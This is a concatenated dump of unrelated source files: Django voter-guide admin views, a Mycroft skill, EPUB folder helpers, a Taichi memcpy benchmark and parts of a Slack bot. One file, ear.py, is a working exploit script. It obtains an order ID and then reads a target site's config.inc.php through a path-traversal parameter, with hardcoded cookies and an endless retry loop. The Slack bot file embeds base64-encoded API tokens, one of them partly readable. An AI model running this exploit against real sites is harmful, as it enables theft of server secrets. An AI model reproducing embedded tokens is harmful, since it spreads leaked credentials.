organization_list = Organization.objects.all()
for organization in organization_list:
# Cycle through elections. Find out position count for this org for each election.
# If > 0, then create a voter_guide entry
if organization.id not in voter_guide_stored_for_this_organization:
for election in election_list:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and google_civic_election_id
google_civic_election_id = int(election.google_civic_election_id) # Convert VarChar to Integer
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
google_civic_election_id=google_civic_election_id).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization.we_vote_id, election.google_civic_election_id)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
for time_span in TIME_SPAN_LIST:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and time_span
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
vote_smart_time_span=time_span).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
organization.we_vote_id, time_span)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
voter_guide_stored_for_this_organization.append(organization.id)
# Cycle through public figures
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_public_figure_voter_guide(1234, 'wv02')
# Cycle through voters
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_voter_voter_guide(1234, 'wv03')
messages.add_message(request, messages.INFO,
'{voter_guide_created_count} voter guides created, '
'{voter_guide_updated_count} updated.'.format(
voter_guide_created_count=voter_guide_created_count,
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def generate_voter_guides_for_one_election_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
if not positive_value_exists(google_civic_election_id):
messages.add_message(request, messages.ERROR,
'Cannot generate voter guides for one election: google_civic_election_id missing')
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
voter_guide_stored_for_this_organization = []
# voter_guide_stored_for_this_public_figure = []
# voter_guide_stored_for_this_voter = []
voter_guide_created_count = 0
voter_guide_updated_count = 0
# What elections do we want to generate voter_guides for?
election_list = Election.objects.all()
# Cycle through organizations
organization_list = Organization.objects.all()
for organization in organization_list:
# Cycle through elections. Find out position count for this org for each election.
# If > 0, then create a voter_guide entry
if organization.id not in voter_guide_stored_for_this_organization:
# organization hasn't had voter guides stored yet in this run through.
# Search for positions with this organization_id and google_civic_election_id
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
google_civic_election_id=google_civic_election_id).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization.we_vote_id, google_civic_election_id)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
for time_span in TIME_SPAN_LIST:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and time_span
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
vote_smart_time_span=time_span).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
organization.we_vote_id, time_span)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
voter_guide_stored_for_this_organization.append(organization.id)
# Cycle through public figures
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_public_figure_voter_guide(1234, 'wv02')
# Cycle through voters
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_voter_voter_guide(1234, 'wv03')
messages.add_message(request, messages.INFO,
'{voter_guide_created_count} voter guides created, '
'{voter_guide_updated_count} updated.'.format(
voter_guide_created_count=voter_guide_created_count,
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def refresh_existing_voter_guides_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
voter_guide_updated_count = 0
# Cycle through existing voter_guides
voter_guide_list_manager = VoterGuideListManager()
voter_guide_manager = VoterGuideManager()
results = voter_guide_list_manager.retrieve_all_voter_guides()
if results['voter_guide_list_found']:
voter_guide_list = results['voter_guide_list']
for voter_guide in voter_guide_list:
if positive_value_exists(voter_guide.organization_we_vote_id):
if positive_value_exists(voter_guide.google_civic_election_id):
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
voter_guide.organization_we_vote_id, voter_guide.google_civic_election_id)
if results['success']:
voter_guide_updated_count += 1
elif positive_value_exists(voter_guide.vote_smart_time_span):
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
voter_guide.organization_we_vote_id, voter_guide.vote_smart_time_span)
if results['success']:
voter_guide_updated_count += 1
messages.add_message(request, messages.INFO,
'{voter_guide_updated_count} updated.'.format(
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def voter_guide_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
voter_guide_list = []
voter_guide_list_object = VoterGuideListManager()
if positive_value_exists(google_civic_election_id):
results = voter_guide_list_object.retrieve_voter_guides_for_election(
google_civic_election_id=google_civic_election_id)
if results['success']:
voter_guide_list = results['voter_guide_list']
else:
order_by = "google_civic_election_id"
results = voter_guide_list_object.retrieve_all_voter_guides(order_by)
if results['success']:
voter_guide_list = results['voter_guide_list']
modified_voter_guide_list = []
position_list_manager = PositionListManager()
for one_voter_guide in voter_guide_list:
# How many Publicly visible positions are there in this election on this voter guide?
retrieve_public_positions = True
one_voter_guide.number_of_public_positions = position_list_manager.fetch_positions_count_for_voter_guide(
one_voter_guide.organization_we_vote_id, one_voter_guide.google_civic_election_id,
retrieve_public_positions)
# How many Friends-only visible positions are there in this election on this voter guide?
retrieve_public_positions = False
one_voter_guide.number_of_friends_only_positions = position_list_manager.fetch_positions_count_for_voter_guide(
one_voter_guide.organization_we_vote_id, one_voter_guide.google_civic_election_id,
retrieve_public_positions)
modified_voter_guide_list.append(one_voter_guide)
election_list = Election.objects.order_by('-election_day_text')
messages_on_stage = get_messages(request)
template_values = {
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'messages_on_stage': messages_on_stage,
'voter_guide_list': modified_voter_guide_list,
}
return render(request, 'voter_guide/voter_guide_list.html', template_values)
@login_required
def voter_guide_search_view(request):
"""
Before creating a voter guide, search for an existing organization
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
@login_required
def voter_guide_search_process_view(request):
"""
Process the new or edit organization forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
add_organization_button = request.POST.get('add_organization_button', False)
if add_organization_button:
return organization_edit_process_view(request)
organization_name = request.POST.get('organization_name', '')
organization_twitter_handle = request.POST.get('organization_twitter_handle', '')
organization_facebook = request.POST.get('organization_facebook', '')
organization_website = request.POST.get('organization_website', '')
# state_served_code = request.POST.get('state_served_code', False)
# Save this variable so we have it on the "Add New Position" page
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
# Filter incoming data
organization_twitter_handle = extract_twitter_handle_from_text_string(organization_twitter_handle)
# Search for organizations that match
organization_email = ''
organization_list_manager = OrganizationListManager()
results = organization_list_manager.organization_search_find_any_possibilities(
organization_name, organization_twitter_handle, organization_website, organization_email,
organization_facebook)
if results['organizations_found']:
organizations_list = results['organizations_list']
organizations_count = len(organizations_list)
messages.add_message(request, messages.INFO, 'We found {count} existing organization(s) '
'that might match.'.format(count=organizations_count))
else:
organizations_list = []
messages.add_message(request, messages.INFO, 'No voter guides found with those search terms. '
'Please try again. ')
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organizations_list': organizations_list,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
``` |
{
"source": "josephflowers-ra/cinder-skill",
"score": 2
} |
#### File: josephflowers-ra/cinder-skill/__init__.py
```python
from mycroft import MycroftSkill, intent_file_handler
class Cinder(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
@intent_file_handler('cinder.intent')
def handle_cinder(self, message):
self.speak_dialog('cinder')
def create_skill():
return Cinder()
``` |
{
"source": "joseph-fuzzing/butian",
"score": 2
} |
#### File: joseph-fuzzing/butian/ear.py
```python
import requests
import re
import time
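# Proof-of-concept flow (reconstructed from the functions below): probe the
# vulnerable endpoint, create an order to obtain `out_trade_no`, derive a
# timestamp from the server's Date response header, then read an arbitrary
# file through the path-traversal `aicon` parameter.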
def checkbug():
burp0_url = url+"/source/pack/mobileconfig/ajax.php"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
urlcode=requests.get(burp0_url, headers=burp0_headers).status_code
return urlcode
def Get_order():
burp0_url = url+"/source/pack/alipay/pay.php?rmb=1000"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
order_html=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
Reorder=re.compile(r'name=\'out_trade_no\' value=\'(.*?)\'')
return Reorder.findall(order_html)[0]
def Get_date(out_trade_no):
burp0_url = url+"/source/pack/alipay/pay_notify.php"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"out_trade_no": out_trade_no}
Get_header=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data).headers
Date=int(time.mktime(time.strptime(Get_header['Date'],"%a, %d %b %Y %H:%M:%S GMT")))
return Date
def readfile(userid,Date):
burp0_url = url+"/source/pack/mobileconfig/ajax.php?ac=mobileconfig&aicon=../../../source/system/config.inc.php"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh,en;q=0.9,zh-CN;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
#burp0_data = {"out_trade_no": userid+"-"+str(Date)}
fileDate_html=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
return fileDate_html
def main():
global in_userpassword,in_userid,in_username,url
in_userid="2"
in_username="<EMAIL>"
in_userpassword="<PASSWORD>"
    url = input('readfile url:')  # raw_input is Python 2; input() for Python 3
if checkbug()==200:
out_trade_no=Get_order()
Date=Get_date(out_trade_no)
fileDate_html=readfile(in_userid,Date)
        if len(fileDate_html) > 6:
            print(fileDate_html)
            exit()
    main()  # retry recursively until the file read succeeds
if __name__ == '__main__':
main()
``` |
{
"source": "JosephGAdams/FanFictionSuite",
"score": 3
} |
#### File: FanFictionSuite/classes/folder_structure.py
```python
import os
import os.path
class folder_structure:
def make_directory(self, location, dir_name):
folder_location = os.path.join(location, dir_name)
try:
            os.mkdir(folder_location, 0o777)
        except Exception as e:
            print(e)
return folder_location
def make_structure(self, location):
epub_folder = self.make_directory(location, 'epub_folder')
meta_inf_folder = self.make_directory(epub_folder, 'META-INF')
oebps_folder = self.make_directory(epub_folder, 'OEBPS')
paths = {
'epub_folder_location': epub_folder,
'meta-inf_folder_location': meta_inf_folder,
'oebps_folder_location': oebps_folder,
}
return paths
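# Example usage (a sketch):
#   paths = folder_structure().make_structure('/path/to/workdir')
#   # creates epub_folder/ containing META-INF/ and OEBPS/, returning their paths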
```
#### File: FanFictionSuite/classes/general_utils.py
```python
import wx
error_messages = {'2': 'File not found'}
class utils:
def error_alert_box(self, message):
wx.MessageBox('{message}\nStory listing will be removed, re-add manually.'.format(message=message),
'Error', wx.OK | wx.ICON_ERROR)
```
#### File: FanFictionSuite/classes/move_book_content.py
```python
import shutil
import os
import os.path
class move_content:
def move_files(self, files, location, content_loc):
for each in files['file_location']:
file_loc = os.path.join(os.path.abspath(each))
name = os.path.basename(file_loc)
src = file_loc
dst = os.path.join(content_loc, name)
shutil.copyfile(src, dst)
``` |
{
"source": "josephgalestian/taichiV2-master",
"score": 2
} |
#### File: benchmarks/microbenchmarks/memcpy.py
```python
from microbenchmarks._items import BenchmarkItem, Container, DataSize, DataType
from microbenchmarks._metric import MetricType
from microbenchmarks._plan import BenchmarkPlan
from microbenchmarks._utils import dtype_size, fill_random, scaled_repeat_times
import taichi as ti
def memcpy_default(arch, repeat, container, dtype, dsize, get_metric):
@ti.kernel
def memcpy_field(dst: ti.template(), src: ti.template()):
for I in ti.grouped(dst):
dst[I] = src[I]
@ti.kernel
def memcpy_array(dst: ti.any_arr(), src: ti.any_arr()):
for I in ti.grouped(dst):
dst[I] = src[I]
repeat = scaled_repeat_times(arch, dsize, repeat)
num_elements = dsize // dtype_size(dtype)
x = container(dtype, num_elements)
y = container(dtype, num_elements)
func = memcpy_field if container == ti.field else memcpy_array
fill_random(x, dtype, container)
return get_metric(repeat, func, y, x)
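# Each run copies `dsize` bytes element-wise between two containers, so the
# reported metric roughly tracks effective memory bandwidth for fields vs. ndarrays.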
class MemcpyPlan(BenchmarkPlan):
def __init__(self, arch: str):
super().__init__('memcpy', arch, basic_repeat_times=10)
self.create_plan(Container(), DataType(), DataSize(), MetricType())
self.add_func(['field'], memcpy_default)
self.add_func(['ndarray'], memcpy_default)
``` |
{
"source": "JosephGarrone/uqcsbot-1",
"score": 2
} |
#### File: uqcsbot-1/test/test_water.py
```python
from test.conftest import MockUQCSBot, TEST_CHANNEL_ID
import re
def test_water_valid_message(uqcsbot: MockUQCSBot):
"""
Test !water <REGION> returns a reading
"""
uqcsbot.post_message(TEST_CHANNEL_ID, '!water SEQ')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"(?:.*) is at \*\d+\.\d+\%\* \((?:.*?)ML of (?:.*?)ML\)").match(messages[-1]['text'])
def test_water_invalid_region(uqcsbot: MockUQCSBot):
"""
Test !water <INVALID_REGION> returns a warning
"""
uqcsbot.post_message(TEST_CHANNEL_ID, '!water abcdefghijklmnopqrstuvwxyz')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"No region or alias found matching '(?:.*?)'").match(messages[-1]['text'])
def test_water_list(uqcsbot: MockUQCSBot):
"""
Test !water <LIST> returns a listing
"""
uqcsbot.post_message(TEST_CHANNEL_ID, '!water list')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"Available regions:(.*)").match(messages[-1]['text'])
```
#### File: uqcsbot-1/uqcsbot/__init__.py
```python
import os
import sys
import importlib
import logging
import argparse
from base64 import b64decode
import json
import requests
from uqcsbot.base import bot, Command, UQCSBot # noqa
LOGGER = logging.getLogger("uqcsbot")
SLACK_VERIFICATION_TOKEN = os.environ.get("SLACK_VERIFICATION_TOKEN", "")
SLACK_BOT_TOKEN = os.environ.get("SLACK_BOT_TOKEN", "")
# Channel group which contains all the bots. Easy way to get all their ids.
SECRET_BOT_MEETING_ROOM = 'G9JJXHF7S'
# UQCSTesting tokens. Everything is base64 encoded to
# somewhat circumvent token tracking by GitHub etal.
#
# Order: uqcsbot-alpha, uqcsbot-beta, uqcsbot-gamma, uqcsbot-delta
BOT_TOKENS = {'<KEY>': '<KEY>',
'<KEY>': '<KEY>',
'<KEY>': '<KEY>',
'<KEY>': '<KEY>'}
for key in BOT_TOKENS:
BOT_TOKENS[key] = b64decode(BOT_TOKENS[key]).decode('utf-8')
# Mitch's UQCSTesting Slack API Token. No touchie >:(
UQCSTESTING_USER_TOKEN = b64decode('<KEY>NTI5LTMyNTEyMzU5ODExNS01Yj'
'dmYjlhYzAyZWYzNDAyNTYyMTJmY2Q2YjQ1NmEyYg==').decode('utf-8')
def get_user_info(user_id):
"""
Returns info about a user
See https://api.slack.com/methods/users.info for the contents of info
"""
api_url = 'https://slack.com/api/users.info'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN, 'user': user_id})
if response.status_code != requests.codes['ok']:
        LOGGER.error(f'Received status code {response.status_code}')
sys.exit(1)
json_contents = json.loads(response.content)
if not json_contents['ok']:
LOGGER.error(json_contents['error'])
sys.exit(1)
return json_contents
def is_active_bot(user_info):
"""
Returns true if the provided user info describes an active bot (i.e. not deleted)
"""
if not user_info['ok']:
return False
user = user_info['user']
return user.get('is_bot', False) and not user['deleted']
def is_bot_available(user_id):
"""
Returns true if the given user_id is an active bot that is available (i.e. is
not currently 'active' which would mean it is in use by another user).
"""
api_url = 'https://slack.com/api/users.getPresence'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN, 'user': user_id})
if response.status_code != requests.codes['ok']:
return False
json_contents = json.loads(response.content)
return json_contents['ok'] and json_contents['presence'] == 'away'
def get_free_test_bot():
"""
Pings a channel on the UQCSTesting Slack that contains all the available
bots, and Mitch. We can poll this channel to find bots which are 'away'
(that is, not currently being used by anyone else)
Returns info about the bot
See https://api.slack.com/methods/users.info for the contents of info
"""
api_url = 'https://slack.com/api/conversations.members'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN,
'channel': SECRET_BOT_MEETING_ROOM})
if response.status_code != requests.codes['ok']:
        LOGGER.error(f'Received status code {response.status_code}')
sys.exit(1)
json_contents = json.loads(response.content)
if not json_contents['ok']:
LOGGER.error(json_contents['error'])
sys.exit(1)
for user_id in json_contents['members']:
info = get_user_info(user_id)
        if is_active_bot(info) and is_bot_available(user_id):
return info
return None
def import_scripts():
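    # Import every script module in uqcsbot/scripts so that their
    # @bot.on_command handlers are registered as a side effect of import.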
dir_path = os.path.dirname(__file__)
scripts_dir = os.path.join(dir_path, 'scripts')
for sub_file in os.listdir(scripts_dir):
if not sub_file.endswith('.py') or sub_file == '__init__.py':
continue
module = f'uqcsbot.scripts.{sub_file[:-3]}'
importlib.import_module(module)
def main():
# Import scripts
import_scripts()
# Setup the CLI argument parser
parser = argparse.ArgumentParser(description='Run UQCSBot')
parser.add_argument('--dev', dest='dev',
action='store_true',
help='Runs the bot in development mode (auto assigns a '
'bot on the uqcstesting Slack team)')
parser.add_argument('--log_level', dest='log_level',
default='INFO',
help='Specifies the output logging level to be used '
'(i.e. DEBUG, INFO, WARNING, ERROR, CRITICAL)')
# Retrieve the CLI args
args = parser.parse_args()
logging.basicConfig(level=args.log_level)
# If in development mode, attempt to allocate an available bot token,
# else stick with the default. If no bot could be allocated, exit.
bot_token = SLACK_BOT_TOKEN
if args.dev:
test_bot = get_free_test_bot()
if test_bot is None:
LOGGER.error('Something went wrong during bot allocation. Please ensure there'
' are bots available and try again later. Exiting.')
sys.exit(1)
bot_token = BOT_TOKENS.get(test_bot['user']['id'], None)
LOGGER.info("Bot name: " + test_bot['user']['name'])
if bot_token is None or bot_token == "":
LOGGER.error("No bot token found!")
sys.exit(1)
bot.run(bot_token, SLACK_VERIFICATION_TOKEN)
if __name__ == "__main__":
main()
```
#### File: uqcsbot/scripts/emojify.py
```python
from uqcsbot import bot, Command
from uqcsbot.utils.command_utils import loading_status
from typing import Dict, List
from collections import defaultdict
from random import shuffle, choice
@bot.on_command("emojify")
@loading_status
def handle_emojify(command: Command):
'''
`!emojify text` - converts text to emoji.
'''
master: Dict[str, List[str]] = defaultdict(lambda: [":grey_question:"])
# letters
master['A'] = [":adobe:", ":airbnb:", ":amazon:", ":anarchism:",
":arch:", ":atlassian:", ":office_access:",
choice([":card-ace-clubs:", ":card-ace-diamonds:",
":card-ace-hearts:", ":card-ace-spades:"])]
master['B'] = [":bhinking:", ":bitcoin:", ":blutes:"]
master['C'] = [":c:", ":clang:", ":cplusplus:", ":copyright:", ":clipchamp:"]
master['D'] = [":d:", ":disney:"]
master['E'] = [":ecorp:", ":emacs:", ":erlang:", ":ie10:", ":thonk_slow:", ":edge:",
":expedia_group:"]
master['F'] = [":f:", ":facebook:"]
master['G'] = [":g+:", ":google:", ":nintendo_gamecube:", ":gatsbyjs:"]
master['H'] = [":hackerrank:", ":homejoy:"]
master['I'] = [":information_source:"]
master['J'] = [":hook:", choice([":card-jack-clubs:", ":card-jack-diamonds:",
":card-jack-hearts:", ":card-jack-spades:"])]
master['K'] = [":kickstarter:", ":kotlin:",
choice([":card-king-clubs:", ":card-king-diamonds:",
":card-king-hearts:", ":card-king-spades:"])]
master['L'] = [":l:", ":lime:", ":l_plate:"]
master['M'] = [":gmail:", ":maccas:", ":mcgrathnicol:", ":melange_mining:", ":mtg:", ":mxnet:"]
master['N'] = [":nano:", ":neovim:", ":netscape_navigator:",
":nginx:", ":nintendo_64:", ":office_onenote:"]
master['O'] = [":office_outlook:", ":oracle:", ":o_:", ":tetris_o:", ":ubuntu:"]
master['P'] = [":auspost:", ":office_powerpoint:", ":office_publisher:",
":pinterest:", ":paypal:", ":producthunt:"]
master['Q'] = [":quora:", ":quantium:", choice([":card-queen-clubs:", ":card-queen-diamonds:",
":card-queen-hearts:", ":card-queen-spades:"])]
master['R'] = [":r-project:", ":rust:", ":redroom:", ":registered:"]
master['S'] = [":s:", ":skedulo:", ":stanford:", ":stripe_s:", ":sublime:", ":tetris_s:"]
master['T'] = [":tanda:", choice([":telstra:", ":telstra-pink:"]),
":tesla:", ":tetris_t:", ":torchwood:", ":tumblr:"]
master['U'] = [":uber:", ":uqu:", ":the_horns:"]
master['V'] = [":vim:", ":vue:", ":vuetify:", ":v:"]
master['W'] = [":office_word:", ":washio:", ":wesfarmers:", ":westpac:",
":weyland_consortium:", ":wikipedia_w:", ":woolworths:"]
master['X'] = [":atlassian_old:", ":aginicx:", ":sonarr:", ":x-files:", ":xbox:",
":x:", ":flag-scotland:", ":office_excel:"]
master['Y'] = [":hackernews:"]
master['Z'] = [":tetris_z:"]
# numbers
master['0'] = [":chrome:", ":suncorp:", ":disney_zero:", ":firefox:",
":mars:", choice([":dvd:", ":cd:"])]
master['1'] = [":techone:", ":testtube:", ":thonk_ping:", ":first_place_medal:"]
master['2'] = [":second_place_medal:", choice([":card-2-clubs:", ":card-2-diamonds:",
":card-2-hearts:", ":card-2-spades:"])]
master['3'] = [":css:", ":third_place_medal:", choice([":card-3-clubs:", ":card-3-diamonds:",
":card-3-hearts:", ":card-3-spades:"])]
master['4'] = [choice([":card-4-clubs:", ":card-4-diamonds:",
":card-4-hearts:"]), ":card-4-spades:"]
master['5'] = [":html:", choice([":card-5-clubs:", ":card-5-diamonds:",
":card-5-hearts:", ":card-5-spades:"])]
master['6'] = [choice([":card-6-clubs:", ":card-6-diamonds:",
":card-6-hearts:", ":card-6-spades:"])]
master['7'] = [choice([":card-7-clubs:", ":card-7-diamonds:",
":card-7-hearts:", ":card-7-spades:"])]
master['8'] = [":8ball:", choice([":card-8-clubs:", ":card-8-diamonds:",
":card-8-hearts:", ":card-8-spades:"])]
master['9'] = [choice([":card-9-clubs:", ":card-9-diamonds:",
":card-9-hearts:", ":card-9-spades:"])]
# whitespace
master[' '] = [":whitespace:"]
master['\n'] = ["\n"]
# other ascii characters (sorted by ascii value)
master['!'] = [":exclamation:"]
master['"'] = [choice([":ldquo:", ":rdquo:"]), ":pig_nose:"]
master['#'] = [":slack_old:", ":csharp:"]
master['$'] = [":thonk_money:", ":moneybag:"]
    # '&' converts to '&amp;'
master['&'] = [":ampersand:", ":dnd:"]
master['*'] = [":day:", ":nab:", ":youtried:", ":msn_star:", ":rune_prayer:", ":wolfram:"]
master['+'] = [":tf2_medic:", ":flag-ch:", ":flag-england:"]
master['-'] = [":no_entry:"]
master['.'] = [":black_small_square:"]
master['/'] = [":slash:"]
    # '>' converts to '&gt;'
master['>'] = [":accenture:", ":implying:", ":plex:", ":powershell:"]
master['?'] = [":question:"]
master['@'] = [":whip:"]
master['^'] = [":this:", ":typographical_carrot:", ":arrow_up:"]
master['~'] = [":wavy_dash:"]
# slack/uqcsbot convert the following to other symbols
# greek letters
    # 'Α' converts to 'A'
    master['Α'] = [":alpha:"]
    # 'Β' converts to 'B'
    master['Β'] = [":beta:"]
    # 'Λ' converts to 'L'
    master['Λ'] = [":halflife:", ":haskell:", ":lambda:", ":racket:"]
    # 'Π' converts to 'P'
    master['Π'] = [":pi:"]
    # 'Σ' converts to 'S'
    master['Σ'] = [":polymathian:"]
    # other symbols (sorted by unicode value)
    # '…' converts to '...'
    master['…'] = [":lastpass:"]
    # '€' converts to 'EUR'
    master['€'] = [":martian_euro:"]
    # '√' converts to '[?]'
    master['√'] = [":sqrt:"]
    # '∞' converts to '[?]'
    master['∞'] = [":arduino:", ":visualstudio:"]
    # '∴' converts to '[?]'
    master['∴'] = [":julia:"]
text = ""
if command.has_arg():
text = command.arg.upper()
# revert HTML conversions
        text = text.replace("&gt;", ">")
        text = text.replace("&lt;", "<")
        text = text.replace("&amp;", "&")
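    # Build a shuffled pool of emoji for each character so that repeated
    # characters cycle through the available options evenly; the '…' entry
    # doubles as the truncation marker used when the response would exceed
    # Slack's 4000-character limit.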
lexicon = {}
    for character in set(text+'…'):
        full, part = divmod((text+'…').count(character), len(master[character]))
shuffle(master[character])
lexicon[character] = full * master[character] + master[character][:part]
shuffle(lexicon[character])
    ellipsis = lexicon['…'].pop()
response = ""
for character in text:
emoji = lexicon[character].pop()
if len(response + emoji + ellipsis) > 4000:
response += ellipsis
break
response += emoji
bot.post_message(command.channel_id, response)
```
#### File: uqcsbot/scripts/events.py
```python
from typing import List
import re
from datetime import date, datetime, timedelta
from calendar import month_name, month_abbr, day_abbr
from icalendar import Calendar
import requests
from pytz import timezone, utc
from typing import Tuple, Optional
from uqcsbot import bot, Command
from uqcsbot.utils.command_utils import UsageSyntaxException, loading_status
from uqcsbot.utils.itee_seminar_utils import (get_seminars, HttpException, InvalidFormatException)
CALENDAR_URL = ("https://calendar.google.com/calendar/ical/"
+ "q3n3pce86072n9knt3pt65fhio%40group.calendar.google.com/public/basic.ics")
FILTER_REGEX = re.compile('full|all|[0-9]+( weeks?)?|jan.*|feb.*|mar.*'
+ '|apr.*|may.*|jun.*|jul.*|aug.*|sep.*|oct.*|nov.*|dec.*')
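# Accepted filter arguments, per FILTER_REGEX above: 'full'/'all', a bare event
# count such as '5', a week span such as '3 weeks', or a month name/abbreviation.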
BRISBANE_TZ = timezone('Australia/Brisbane')
# empty string to one-index
MONTH_NUMBER = {month.lower(): index for index, month in enumerate(month_abbr)}
class EventFilter(object):
def __init__(self, full=False, weeks=None, cap=None, month=None, is_valid=True):
